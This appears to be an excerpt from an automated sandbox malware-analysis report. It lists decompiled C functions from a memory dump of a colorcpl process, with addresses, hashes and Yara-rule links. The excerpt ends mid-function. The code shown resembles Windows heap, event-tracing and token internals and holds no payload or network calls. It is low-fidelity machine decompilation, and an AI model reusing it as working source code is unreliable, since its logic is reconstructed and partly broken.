                                                                                                • Instruction Fuzzy Hash: 0E81B472A147018FDF95EE14C880A7E73EAEB84294F25585AED5D9B244D330ED40CBE2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E4138B Relevance: .2, Instructions: 206COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 85%
                                                                                                			E06E4138B(signed int __ecx, signed int* __edx, intOrPtr _a4, signed int _a12, signed int _a16, char _a20, intOrPtr _a24) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				signed int _t97;
				signed int _t102;
				void* _t105;
				char* _t112;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				signed int* _t122;
				signed int _t124;
				signed int _t130;
				signed int _t136;
				char _t150;
				intOrPtr _t153;
				signed int _t161;
				signed int _t163;
				signed int _t170;
				signed int _t175;
				signed int _t176;
				signed int _t182;
				signed int* _t183;
				signed int* _t184;

				_t182 = __ecx;
				_t153 = _a24;
				_t183 = __edx;
				_v24 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
				_t97 = _t153 - _a16;
				if(_t97 > 0xfffff000) {
					L19:
					return 0;
				}
				asm("cdq");
				_t150 = _a20;
				_v16 = _t97 / 0x1000;
				_t102 = _a4 + 0x00000007 & 0xfffffff8;
				_t170 = _t102 + __edx;
				_v20 = _t102 >> 0x00000003 & 0x0000ffff;
				_t105 = _t170 + 0x28;
				_v12 = _t170;
				if(_t105 >= _t150) {
					if(_t105 >= _t153) {
						goto L19;
					}
					_v8 = _t170 - _t150 + 8;
					_push(E06E40678(__ecx, 1));
					_push(0x1000);
					_push( &_v8);
					_push(0);
					_push( &_a20);
					_push(0xffffffff);
					if(E06E59660() < 0) {
						 *((intOrPtr*)(_t182 + 0x214)) =  *((intOrPtr*)(_t182 + 0x214)) + 1;
						goto L19;
					}
					if(E06E37D50() == 0) {
						_t112 = 0x7ffe0380;
					} else {
						_t112 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t112 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E06ED138A(_t150, _t182, _a20, _v8, 3);
					}
					_t150 = _a20 + _v8;
					_t153 = _a24;
					_a20 = _t150;
				}
				_t183[0] = 1;
				_t113 = _t153 - _t150;
				_t183[1] = 1;
				asm("cdq");
				_t175 = _t113 % 0x1000;
				_v28 = _t113 / 0x1000;
				 *_t183 = _v20;
				_t183[1] =  *(_t182 + 0x54);
				if((_v24 & 0x00001000) != 0) {
					_t117 = E06E416C7(1, _t175);
					_t150 = _a20;
					_t183[0xd] = _t117;
				}
				_t183[0xb] = _t183[0xb] & 0x00000000;
				_t176 = _v12;
				_t183[3] = _a12;
				_t119 = _a16;
				_t183[7] = _t119;
				_t161 = _v16 << 0xc;
				_t183[6] = _t182;
				_t183[0xa] = _t119 + _t161;
				_t183[8] = _v16;
				_t122 =  &(_t183[0xe]);
				_t183[2] = 0xffeeffee;
				_t183[9] = _t176;
				 *((intOrPtr*)(_t182 + 0x1e8)) =  *((intOrPtr*)(_t182 + 0x1e8)) + _t161;
				 *((intOrPtr*)(_t182 + 0x1e4)) =  *((intOrPtr*)(_t182 + 0x1e4)) + _t161;
				_t122[1] = _t122;
				 *_t122 = _t122;
				if(_t183[6] != _t183) {
					_t124 = 1;
				} else {
					_t124 = 0;
				}
				_t183[1] = _t124;
				 *(_t176 + 4) =  *_t183 ^  *(_t182 + 0x54);
				if(_t183[6] != _t183) {
					_t130 = (_t176 - _t183 >> 0x10) + 1;
					_v24 = _t130;
					if(_t130 >= 0xfe) {
						_push(_t161);
						_push(0);
						E06EDA80D(_t183[6], 3, _t176, _t183);
						_t150 = _a20;
						_t176 = _v12;
						_t130 = _v24;
					}
				} else {
					_t130 = 0;
				}
				 *(_t176 + 6) = _t130;
				E06E3B73D(_t182, _t183, _t150 - 0x18, _v28 << 0xc, _t176,  &_v8);
				if( *((intOrPtr*)(_t182 + 0x4c)) != 0) {
					_t183[0] = _t183[0] ^  *_t183 ^ _t183[0];
					 *_t183 =  *_t183 ^  *(_t182 + 0x50);
				}
				if(_v8 != 0) {
					E06E3A830(_t182, _v12, _v8);
				}
				_t136 = _t182 + 0xa4;
				_t184 =  &(_t183[4]);
				_t163 =  *(_t136 + 4);
				if( *_t163 != _t136) {
					_push(_t163);
					_push( *_t163);
					E06EDA80D(0, 0xd, _t136, 0);
				} else {
					 *_t184 = _t136;
					_t184[1] = _t163;
					 *_t163 = _t184;
					 *(_t136 + 4) = _t184;
				}
				 *((intOrPtr*)(_t182 + 0x1f4)) =  *((intOrPtr*)(_t182 + 0x1f4)) + 1;
				return 1;
			}































                                                                                                0x06e4139f
                                                                                                0x06e413a1
                                                                                                0x06e413a4
                                                                                                0x06e413a6
                                                                                                0x06e413ab
                                                                                                0x06e413b3
                                                                                                0x06e85522
                                                                                                0x00000000
                                                                                                0x06e85522
                                                                                                0x06e413b9
                                                                                                0x06e413c1
                                                                                                0x06e413c4
                                                                                                0x06e413cd
                                                                                                0x06e413d0
                                                                                                0x06e413d9
                                                                                                0x06e413dc
                                                                                                0x06e413df
                                                                                                0x06e413e4
                                                                                                0x06e8552b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e85534
                                                                                                0x06e8553f
                                                                                                0x06e85545
                                                                                                0x06e85549
                                                                                                0x06e8554a
                                                                                                0x06e8554f
                                                                                                0x06e85550
                                                                                                0x06e85559
                                                                                                0x06e8551c
                                                                                                0x00000000
                                                                                                0x06e8551c
                                                                                                0x06e85562
                                                                                                0x06e85574
                                                                                                0x06e85564
                                                                                                0x06e8556d
                                                                                                0x06e8556d
                                                                                                0x06e8557c
                                                                                                0x06e85597
                                                                                                0x06e85597
                                                                                                0x06e8559f
                                                                                                0x06e855a2
                                                                                                0x06e855a5
                                                                                                0x06e855a5
                                                                                                0x06e413ec
                                                                                                0x06e413f2
                                                                                                0x06e413f4
                                                                                                0x06e413f8
                                                                                                0x06e413fe
                                                                                                0x06e41400
                                                                                                0x06e41406
                                                                                                0x06e41412
                                                                                                0x06e41419
                                                                                                0x06e855b0
                                                                                                0x06e855b5
                                                                                                0x06e855b8
                                                                                                0x06e855b8
                                                                                                0x06e41425
                                                                                                0x06e41429
                                                                                                0x06e4142c
                                                                                                0x06e4142f
                                                                                                0x06e41432
                                                                                                0x06e41435
                                                                                                0x06e4143a
                                                                                                0x06e4143d
                                                                                                0x06e41443
                                                                                                0x06e41446
                                                                                                0x06e41449
                                                                                                0x06e41450
                                                                                                0x06e41453
                                                                                                0x06e41459
                                                                                                0x06e4145f
                                                                                                0x06e41462
                                                                                                0x06e41467
                                                                                                0x06e414fa
                                                                                                0x06e4146d
                                                                                                0x06e4146d
                                                                                                0x06e4146d
                                                                                                0x06e4146f
                                                                                                0x06e41479
                                                                                                0x06e41480
                                                                                                0x06e41507
                                                                                                0x06e41508
                                                                                                0x06e41510
                                                                                                0x06e855c1
                                                                                                0x06e855c2
                                                                                                0x06e855cc
                                                                                                0x06e855d1
                                                                                                0x06e855d4
                                                                                                0x06e855d7
                                                                                                0x06e855d7
                                                                                                0x06e41482
                                                                                                0x06e41482
                                                                                                0x06e41482
                                                                                                0x06e41484
                                                                                                0x06e4149b
                                                                                                0x06e414a4
                                                                                                0x06e414ae
                                                                                                0x06e414b4
                                                                                                0x06e414b4
                                                                                                0x06e414ba
                                                                                                0x06e414c4
                                                                                                0x06e414c4
                                                                                                0x06e414c9
                                                                                                0x06e414cf
                                                                                                0x06e414d2
                                                                                                0x06e414d7
                                                                                                0x06e855df
                                                                                                0x06e855e0
                                                                                                0x06e855ea
                                                                                                0x06e414dd
                                                                                                0x06e414dd
                                                                                                0x06e414df
                                                                                                0x06e414e2
                                                                                                0x06e414e4
                                                                                                0x06e414e4
                                                                                                0x06e414e7
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                                                                                • Instruction ID: 4c78acc6a8449e3f4376a77ce443607038f2e8f97e4755d5039b81fbf190189e
                                                                                                • Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                                                                                • Instruction Fuzzy Hash: A1819C75A003459FCBA4DF68C844BEABBF5FF48344F109569E85AC7651D730EA81CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E96DC9 Relevance: .2, Instructions: 199COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 79%
                                                                                                			E06E96DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L06E34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E06E96B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E06E37D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E06E59AE0();
					_t87 = L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E06E9795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E06E9795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E06E9795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E06E9795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L06E34620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E06E96B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E06E96B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E06E96B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E06E96B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E06E37D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E06E59AE0();
								L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L06E32400( &_v36);
							if(_v24 >= 0) {
								_t87 = L06E32400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L06E32400( &_v52);
							}
							if(_v28 >= 0) {
								return L06E32400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                                                                0x06e96dd4
                                                                                                0x06e96dde
                                                                                                0x06e96de1
                                                                                                0x06e96de3
                                                                                                0x06e96de6
                                                                                                0x06e96de9
                                                                                                0x06e96dec
                                                                                                0x06e96def
                                                                                                0x06e96df2
                                                                                                0x06e96df5
                                                                                                0x06e96dfe
                                                                                                0x06e96e04
                                                                                                0x06e96e09
                                                                                                0x06e96e0d
                                                                                                0x06e96e18
                                                                                                0x06e96e1b
                                                                                                0x06e96e22
                                                                                                0x06e96e2d
                                                                                                0x06e96e30
                                                                                                0x06e96e36
                                                                                                0x06e96e42
                                                                                                0x06e96e4d
                                                                                                0x06e96e50
                                                                                                0x06e96e55
                                                                                                0x06e96e5c
                                                                                                0x06e96e6e
                                                                                                0x06e96e5e
                                                                                                0x06e96e67
                                                                                                0x06e96e67
                                                                                                0x06e96e73
                                                                                                0x06e96e74
                                                                                                0x06e96e77
                                                                                                0x06e96e7c
                                                                                                0x06e96e7d
                                                                                                0x06e96e8e
                                                                                                0x06e96e93
                                                                                                0x06e96e9c
                                                                                                0x06e96ea8
                                                                                                0x06e96eab
                                                                                                0x06e96eac
                                                                                                0x06e96eb3
                                                                                                0x06e96ecd
                                                                                                0x06e96edc
                                                                                                0x06e96ee2
                                                                                                0x06e96ee5
                                                                                                0x06e96ef2
                                                                                                0x06e96efb
                                                                                                0x06e96f01
                                                                                                0x06e96f06
                                                                                                0x06e96f0b
                                                                                                0x06e96f11
                                                                                                0x06e96f1a
                                                                                                0x06e96f22
                                                                                                0x06e96f26
                                                                                                0x06e96f26
                                                                                                0x06e96f33
                                                                                                0x06e96f41
                                                                                                0x06e96f44
                                                                                                0x06e96f47
                                                                                                0x06e96f54
                                                                                                0x06e96f65
                                                                                                0x06e96f77
                                                                                                0x06e96f7c
                                                                                                0x06e96f82
                                                                                                0x06e96f91
                                                                                                0x06e96f99
                                                                                                0x06e96fa3
                                                                                                0x06e96fae
                                                                                                0x06e96fae
                                                                                                0x06e96fba
                                                                                                0x06e96fbb
                                                                                                0x06e96fbc
                                                                                                0x06e96fc1
                                                                                                0x06e96fc2
                                                                                                0x06e96fd3
                                                                                                0x06e96fd8
                                                                                                0x06e96fd8
                                                                                                0x06e96fdf
                                                                                                0x06e96fe8
                                                                                                0x06e96fee
                                                                                                0x06e96fee
                                                                                                0x06e96ff5
                                                                                                0x06e96ffb
                                                                                                0x06e96ffb
                                                                                                0x06e97004
                                                                                                0x00000000
                                                                                                0x06e9700a
                                                                                                0x06e97004
                                                                                                0x06e96eb3
                                                                                                0x06e96e9c
                                                                                                0x06e97015

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                • Instruction ID: 48fcd0032af07dddc40e4cf0bb64d97cbc0096ed4730dd1ec5ffa8233359fd9a
                                                                                                • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                • Instruction Fuzzy Hash: 3C717E71E10319EFDF90DFA4C984AEEBBB9FF48714F105069E514A7250EB30AA45CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EAB8D0 Relevance: .2, Instructions: 199COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 39%
                                                                                                			E06EAB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x6f07b9c; // 0x0
				_t124 = L06E34620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E06E59800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E06E595B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E06E595D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L06E377F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E06E59910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E06E595D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x6f07b9c; // 0x0
									_t92 = L06E34620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E06E59910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E06E1A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E06EAE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E06EAE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E06E595B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                                                                0x06eab8d9
                                                                                                0x06eab8e4
                                                                                                0x00000000
                                                                                                0x06eab8e6
                                                                                                0x06eab8f3
                                                                                                0x06eab8f5
                                                                                                0x06eab8f5
                                                                                                0x06eab8f8
                                                                                                0x06eab920
                                                                                                0x06eab924
                                                                                                0x06eab936
                                                                                                0x06eab939
                                                                                                0x06eab93d
                                                                                                0x06eab948
                                                                                                0x06eab9a0
                                                                                                0x06eab9a0
                                                                                                0x06eab9a4
                                                                                                0x06eab9bf
                                                                                                0x06eab9c4
                                                                                                0x06eab9c6
                                                                                                0x06eab9cd
                                                                                                0x06eab9d1
                                                                                                0x06eabad4
                                                                                                0x06eabad8
                                                                                                0x06eabada
                                                                                                0x06eabadc
                                                                                                0x06eabadc
                                                                                                0x06eabadf
                                                                                                0x06eabae0
                                                                                                0x06eabae2
                                                                                                0x06eabae4
                                                                                                0x06eabaec
                                                                                                0x06eabaee
                                                                                                0x06eabaf0
                                                                                                0x06eabaf0
                                                                                                0x06eabaec
                                                                                                0x06eabafb
                                                                                                0x06eabafc
                                                                                                0x06eabafe
                                                                                                0x06eabb01
                                                                                                0x06eabb01
                                                                                                0x00000000
                                                                                                0x06eabb06
                                                                                                0x06eab9d7
                                                                                                0x06eab9db
                                                                                                0x06eab9db
                                                                                                0x06eab9de
                                                                                                0x06eab9de
                                                                                                0x06eab9e4
                                                                                                0x06eab9e7
                                                                                                0x06eab9ea
                                                                                                0x06eab9ec
                                                                                                0x06eab9ef
                                                                                                0x06eab9f3
                                                                                                0x06eaba1b
                                                                                                0x06eaba1b
                                                                                                0x06eaba23
                                                                                                0x06eaba24
                                                                                                0x06eaba27
                                                                                                0x06eaba2a
                                                                                                0x06eaba2b
                                                                                                0x06eaba2e
                                                                                                0x06eaba30
                                                                                                0x06eaba37
                                                                                                0x06eaba3f
                                                                                                0x06eaba9c
                                                                                                0x06eabaa2
                                                                                                0x06eabb13
                                                                                                0x06eabb15
                                                                                                0x06eabaae
                                                                                                0x06eabaae
                                                                                                0x06eabab3
                                                                                                0x06eabab5
                                                                                                0x06eababa
                                                                                                0x06eabac8
                                                                                                0x06eabac8
                                                                                                0x06eababa
                                                                                                0x06eabacd
                                                                                                0x06eabacf
                                                                                                0x00000000
                                                                                                0x06eabacf
                                                                                                0x06eabb1a
                                                                                                0x00000000
                                                                                                0x06eabb1c
                                                                                                0x06eabaa7
                                                                                                0x06eabb11
                                                                                                0x00000000
                                                                                                0x06eabb11
                                                                                                0x06eabaa9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06eaba41
                                                                                                0x06eaba41
                                                                                                0x06eaba41
                                                                                                0x06eaba58
                                                                                                0x06eaba5d
                                                                                                0x06eaba62
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06eaba64
                                                                                                0x06eaba67
                                                                                                0x06eaba68
                                                                                                0x06eaba69
                                                                                                0x06eaba6c
                                                                                                0x06eaba6f
                                                                                                0x06eaba71
                                                                                                0x06eaba78
                                                                                                0x06eaba80
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06eaba90
                                                                                                0x06eaba90
                                                                                                0x06eaba97
                                                                                                0x00000000
                                                                                                0x06eaba97
                                                                                                0x06eab9f5
                                                                                                0x06eab9f7
                                                                                                0x06eab9f7
                                                                                                0x06eab9fa
                                                                                                0x06eaba03
                                                                                                0x06eaba07
                                                                                                0x06eaba0c
                                                                                                0x06eaba10
                                                                                                0x06eaba17
                                                                                                0x00000000
                                                                                                0x06eab9f7
                                                                                                0x06eab9a6
                                                                                                0x06eab9a8
                                                                                                0x06eab9af
                                                                                                0x06eab9b3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06eab9b9
                                                                                                0x00000000
                                                                                                0x06eab9b9
                                                                                                0x06eab94d
                                                                                                0x06eab98f
                                                                                                0x06eab995
                                                                                                0x06eab999
                                                                                                0x06eab960
                                                                                                0x06eab967
                                                                                                0x06eab968
                                                                                                0x06eab96a
                                                                                                0x00000000
                                                                                                0x06eab96a
                                                                                                0x06eab99b
                                                                                                0x06eab99e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06eab99e
                                                                                                0x06eab951
                                                                                                0x06eab954
                                                                                                0x06eab95a
                                                                                                0x06eab95e
                                                                                                0x06eab972
                                                                                                0x06eab979
                                                                                                0x06eab97d
                                                                                                0x06eab97f
                                                                                                0x06eab980
                                                                                                0x06eab982
                                                                                                0x06eab984
                                                                                                0x00000000
                                                                                                0x06eab984
                                                                                                0x00000000
                                                                                                0x06eab926
                                                                                                0x00000000
                                                                                                0x06eab926

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b3afeaab54403271a45989b4cf64dbb5754dc90200ea4b2314b0fc5a645bc310
                                                                                                • Instruction ID: 19acbee7b9c6f63969d103a961031547fd203a35265eca7f1579d489078d3dc0
                                                                                                • Opcode Fuzzy Hash: b3afeaab54403271a45989b4cf64dbb5754dc90200ea4b2314b0fc5a645bc310
                                                                                                • Instruction Fuzzy Hash: 0671FE32600701EFE7B18F24CD84FA6BBEAEF40724F115528E6658B6A0DB75F940CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E152A5 Relevance: .2, Instructions: 161COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 78%
                                                                                                			E06E152A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E06E2EEF0(0x6f079a0);
					_t104 =  *0x6f08210; // 0xe22d88
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E06E2EB70(_t93, 0x6f079a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E06E59890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E06E2EEF0(0x6f079a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E06E2EB70(0, 0x6f079a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xe22d95
								_t93 = _t13;
